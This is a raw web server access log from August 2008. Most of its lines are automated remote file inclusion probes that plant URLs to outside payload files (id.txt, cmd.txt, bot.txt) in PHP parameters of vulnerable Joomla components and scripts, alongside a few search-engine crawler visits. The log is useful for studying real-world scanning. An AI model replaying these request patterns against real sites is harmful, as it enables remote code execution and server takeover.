87.106.77.242 - - [22/Aug/2008:04:29:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
195.149.115.2 - - [22/Aug/2008:04:30:02 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:30:03 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:30:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
65.55.208.139 - - [22/Aug/2008:04:30:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [22/Aug/2008:04:30:43 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.185.237.191 - - [22/Aug/2008:04:30:49 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:30:49 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:30:50 -0500] "GET //?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:30:50 -0500] "GET //?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:30:50 -0500] "GET /logs//?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 96221 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:30:50 -0500] "GET /logs//?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 96221 "-""libwww-perl/5.810"
70.85.201.66 - - [22/Aug/2008:04:32:26 -0500] "GET /logs//?sIncPath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.811"
70.85.201.66 - - [22/Aug/2008:04:32:26 -0500] "GET //?sIncPath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
89.208.43.121 - - [22/Aug/2008:04:33:31 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:33:32 -0500] "GET //include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:33:32 -0500] "GET /logs//include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.106.101.71 - - [22/Aug/2008:04:36:01 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.106.101.71 - - [22/Aug/2008:04:36:02 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.106.101.71 - - [22/Aug/2008:04:36:02 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
87.106.101.71 - - [22/Aug/2008:04:36:02 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
89.208.43.121 - - [22/Aug/2008:04:36:10 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
64.13.225.31 - - [22/Aug/2008:04:36:36 -0500] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
64.13.225.31 - - [22/Aug/2008:04:36:36 -0500] "GET //lostpasswd.php?env[include_prefix]=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.208.43.121 - - [22/Aug/2008:04:37:00 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:37:00 -0500] "GET //skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:37:00 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:38:08 -0500] "GET //skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:38:35 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:38:51 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:38:51 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:38:52 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
60.244.114.2 - - [22/Aug/2008:04:38:54 -0500] "GET /logs/access_log.1208736000/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
89.208.43.121 - - [22/Aug/2008:04:39:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:40:20 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
64.22.85.186 - - [22/Aug/2008:04:40:57 -0500] "GET //cyberfolio/portfolio/msg/view.php?av=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
195.11.67.10 - - [22/Aug/2008:04:41:38 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 200 98953 "-""kixsl3umfeiiDsmnlutkskxhh"
74.55.136.66 - - [22/Aug/2008:04:42:09 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:04:42:10 -0500] "GET //include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:04:42:10 -0500] "GET /logs//include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.23.226.2 - - [22/Aug/2008:04:42:49 -0500] "GET /logs//errors.php?error=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.67"
81.23.226.2 - - [22/Aug/2008:04:42:50 -0500] "GET //errors.php?error=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.67"
208.116.1.202 - - [22/Aug/2008:04:43:18 -0500] "GET /join.php?DOCUMENT_ROOT=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
208.116.1.202 - - [22/Aug/2008:04:43:18 -0500] "GET /logs/join.php?DOCUMENT_ROOT=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
74.55.136.66 - - [22/Aug/2008:04:44:19 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:44:31 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:44:31 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:44:56 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:44:56 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:44:57 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.169.166.27 - - [22/Aug/2008:04:45:30 -0500] "GET /logs/access_log.1214438400//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.69"
81.169.166.27 - - [22/Aug/2008:04:45:31 -0500] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
81.169.166.27 - - [22/Aug/2008:04:45:31 -0500] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.69"
70.85.201.66 - - [22/Aug/2008:04:46:15 -0500] "GET /logs//errors.php?error=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
70.85.201.66 - - [22/Aug/2008:04:46:16 -0500] "GET //errors.php?error=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
89.208.43.121 - - [22/Aug/2008:04:46:50 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:46:50 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:47:14 -0500] "GET /errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:47:18 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:47:20 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:47:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:49:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:49:35 -0500] "GET //skin/zero_vote/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:50:26 -0500] "GET /logs/errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:50:26 -0500] "GET /errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:51:10 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
203.131.131.242 - - [22/Aug/2008:04:54:31 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 200 65536 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.208.43.121 - - [22/Aug/2008:04:55:06 -0500] "GET /logs/access_log.1203724800//skin/zero_vote/ask_password.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
203.131.131.242 - - [22/Aug/2008:04:55:09 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 200 65536 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.208.43.121 - - [22/Aug/2008:04:55:17 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:55:18 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.131.131.242 - - [22/Aug/2008:04:55:22 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 200 65536 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.226.79.133 - - [22/Aug/2008:04:57:20 -0500] "GET /logs/access_log.1214179200/components/com_performs/performs.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
208.226.79.133 - - [22/Aug/2008:04:57:20 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
208.226.79.133 - - [22/Aug/2008:04:57:20 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
64.22.85.186 - - [22/Aug/2008:04:58:30 -0500] "GET //cyberfolio/portfolio/msg/view.php?av=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
82.194.76.177 - - [22/Aug/2008:04:59:42 -0500] "GET ///vwar/backup/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 308 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
82.194.76.177 - - [22/Aug/2008:04:59:42 -0500] "GET /logs///vwar/backup/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 313 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
66.135.41.76 - - [22/Aug/2008:05:01:01 -0500] "GET /logs//layout/default/params.php?gConf[dir][layouts]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:05:01:21 -0500] "GET //layout/default/params.php?gConf[dir][layouts]=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
195.149.115.2 - - [22/Aug/2008:05:05:50 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:05:51 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:05:52 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
74.52.99.98 - - [22/Aug/2008:05:06:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:05:06:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
213.92.85.234 - - [22/Aug/2008:05:10:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
213.92.85.234 - - [22/Aug/2008:05:10:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
202.153.103.148 - - [22/Aug/2008:05:11:17 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
202.153.103.148 - - [22/Aug/2008:05:11:18 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
66.135.41.76 - - [22/Aug/2008:05:12:24 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:05:12:24 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
195.149.115.2 - - [22/Aug/2008:05:12:46 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:12:46 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:12:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:15:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:05:15:41 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
64.13.225.31 - - [22/Aug/2008:05:15:58 -0500] "GET /logs//errors.php?error=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
64.13.225.31 - - [22/Aug/2008:05:15:58 -0500] "GET //errors.php?error=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
64.13.225.31 - - [22/Aug/2008:05:16:11 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.13.225.31 - - [22/Aug/2008:05:16:11 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.pslg.info/admin/backup/AhoK/lang/cmd.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.212.173.42 - - [22/Aug/2008:05:16:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:05:16:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
79.170.40.180 - - [22/Aug/2008:05:16:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:05:16:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
213.209.162.250 - - [22/Aug/2008:05:18:32 -0500] "GET /logs/access_log.1203724800 HTTP/1.1" 200 65536 "http://alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=2008&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=%2B52&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=%40yahoo.mx&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=419+mails&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=an&doctype=text&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=2008&dto%5Bu%5D=on&dto%5Bd%5D=22&dto%5Bm%5D=8&dto%5By%5D=2008&hits=100""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"
200.251.162.130 - - [22/Aug/2008:05:18:50 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paijoe.007gb.com/rfi/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
200.251.162.130 - - [22/Aug/2008:05:18:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://paijoe.007gb.com/rfi/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
198.145.244.100 - - [22/Aug/2008:05:19:30 -0500] "GET /logs/index.php?sourcedir=http://heavenhome.co.kr/zbxe/readme1.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
198.145.244.100 - - [22/Aug/2008:05:19:30 -0500] "GET /index.php?sourcedir=http://heavenhome.co.kr/zbxe/readme1.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.6.8.121 - - [22/Aug/2008:05:22:24 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
204.3.160.212 - - [22/Aug/2008:05:23:29 -0500] "GET /logs//atom.php5?page=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:05:23:30 -0500] "GET //atom.php5?page=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:05:27:00 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 302 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:05:27:00 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 297 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:05:28:26 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 293 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:05:28:26 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 288 "-""libwww-perl/5.50"
193.34.17.159 - - [22/Aug/2008:05:28:40 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
193.34.17.159 - - [22/Aug/2008:05:28:40 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
198.106.193.60 - - [22/Aug/2008:05:29:35 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 293 "-""libwww-perl/5.50"
198.106.193.60 - - [22/Aug/2008:05:29:35 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 288 "-""libwww-perl/5.50"
74.52.66.242 - - [22/Aug/2008:05:30:47 -0500] "GET /logs/access_log.1206230400//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:05:30:47 -0500] "GET //?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:05:30:48 -0500] "GET /logs//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 96221 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:05:31:03 -0500] "GET /logs/access_log.1201564800//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
201.130.79.132 - - [22/Aug/2008:05:32:30 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
201.130.79.132 - - [22/Aug/2008:05:32:31 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geo.ya.com/v3g3t4/cc/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
193.34.17.159 - - [22/Aug/2008:05:32:37 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
193.34.17.159 - - [22/Aug/2008:05:32:37 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
74.52.66.242 - - [22/Aug/2008:05:32:41 -0500] "GET //?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
222.122.31.174 - - [22/Aug/2008:05:32:54 -0500] "GET /logs/access_log.1206230400//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
222.122.31.174 - - [22/Aug/2008:05:32:55 -0500] "GET //?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
222.122.31.174 - - [22/Aug/2008:05:32:56 -0500] "GET /logs//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
222.122.31.174 - - [22/Aug/2008:05:33:27 -0500] "GET /logs/access_log.1201564800//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
89.208.43.121 - - [22/Aug/2008:05:34:21 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:05:34:21 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
217.79.182.204 - - [22/Aug/2008:05:34:45 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
